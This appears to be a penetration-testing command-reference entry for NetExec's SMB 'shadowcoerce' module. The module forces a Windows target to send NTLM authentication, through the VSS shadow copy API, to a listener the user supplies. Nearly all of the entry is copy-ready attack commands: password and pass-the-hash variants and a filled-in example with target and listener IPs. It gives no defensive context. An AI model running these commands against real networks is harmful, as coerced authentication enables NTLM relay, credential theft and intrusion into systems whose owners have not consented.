NetExec SMB ShadowCoerce

Coerce NTLM authentication via the VSS shadow copy API (ShadowCoerce)

Tool
nxc
Category
Credential Attacks / NTLM Relay & Coercion
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc smb '<ip>' -u '<user>' -p '<password>' -M shadowcoerce -o LISTENER=<listener_ip>

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

nxc smb '<ip>' -u '<user>' -H '<hash>' -M shadowcoerce -o LISTENER=<listener_ip>

Examples

nxc smb '192.168.1.100' -u 'user' -p 'password' -M shadowcoerce -o LISTENER=192.168.1.50

Tags

nxc smb shadowcoerce vss ntlm-relay coerce